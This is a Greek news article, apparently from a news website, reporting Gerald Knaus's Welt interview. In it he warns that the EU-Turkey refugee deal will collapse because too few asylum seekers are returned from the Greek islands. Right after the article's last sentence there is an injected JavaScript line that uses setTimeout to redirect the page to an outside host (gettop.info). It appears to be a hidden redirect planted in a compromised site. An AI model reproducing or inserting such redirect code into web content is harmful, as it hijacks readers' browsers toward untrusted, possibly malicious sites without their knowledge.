Άτυπος σύμβουλος Μέρκελ: Η ΕΕ παίζει ρώσικη ρουλέτα με το προσφυγικό

0
7

 

Με συνέντευξή του στη Welt ο εμπνευστής της συμφωνίας ΕΕ-Τουρκίας και άτυπος σύμβουλος της καγκελαρίου Μέρκελ, Γκέραλντ Κνάους σημείωσε πως «εάν δεν καταφέρουμε επιτέλους να επαναπροωθήσουμε πρόσφυγες από τα ελληνικά νησιά στην Τουρκία η συμφωνία ΕΕ-Τουρκίας θα καταρρεύσει».

Ο Αυστριακός Γκέραλντ Κνάους, ο οποίος είναι και διευθυντής της Πρωτοβουλίας Ευρωπαϊκής Σταθερότητας (ΕSI), έκρουσε τον κώδωνα του κινδύνου ότι «η ΕΕ δεν στέλνει στην Ελλάδα όσους υπαλλήλους απαιτούνται για τη διαδικασία εξέτασης των αιτημάτων παροχής ασύλου. Και στο σημείο αυτό υπάρχουν εκκρεμότητες από πλευράς Ευρωπαϊκής Ενωσης» σημειώνοντας επιλέον: «Η Ευρώπη παίζει αυτόν τον καιρό ρώσικη ρουλέτα. Οσο ακόμα διαρκεί η συμφωνία Ε.Ε.- Τουρκίας είναι ένα δώρο, το οποίο πρέπει να αξιοποιηθεί από την ΕΕ».

Επιπλέον επεσήμανε ότι κυρίως λόγω του «αισθήματος της έλλειψης προοπτικής» πήγαν στην Ελλάδα φέτος το καλοκαίρι μόνο 50 άνθρωποι. Οι πρόσφυγες στην Τουρκία διαπιστώνουν όμως το εύθραυστο της συμφωνίας και από τον Ιούλιο έως τον Αύγουστο διπλασιάστηκαν». Οι πρόσφυγες αντιλαμβάνονται ότι δεν είναι τελικά και τόσο μικρές οι πιθανότητες να παραμείνουν στην Ελλάδα και -έστω με κάποια καθυστέρηση- να συνεχίσουν μετά προς τον βορρά. Αν σκεφτεί κανείς ότι από την αρχή της ισχύος της συμφωνίας ΕΕ-Τουρκίας πέρασαν μέσω του Αιγαίου στην Ελλάδα 15.000 πρόσφυγες και επαναπροωθήθηκαν μόνο 580, είναι λογικό«.

Ο κ. Κνάους κρίνει ανεπαρκή βασικά σημεία της συμφωνίας όπως για παράδειγμ στους Σύρους που έχει γίνει πλέον σαφές ότι δεν θα υποχρεωθούν να επιστρέψουν στην Τουρκία. Οι ελληνικές Αρχές αποκλείουν την επαναπροώθηση, διότι θεωρούν, όπως άλλωστε και οι οργανώσεις για τα ανθρώπινα δικαιώματα, ότι η κατάσταση για όσους επιζητούν άσυλο στην Τουρκία δεν είναι καλή. Επιπλέον, θεωρεί ότι η ΕΕ οφείλει να πιέσει την ΛΑγκυρα να θεσπίσει μια αξιόπιστη διαδικασία παροχής ασύλου για τους πρόσφυγες, ώστε να είναι πιο εύκολο για την Αθήνα να τους επαναπροωθεί. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here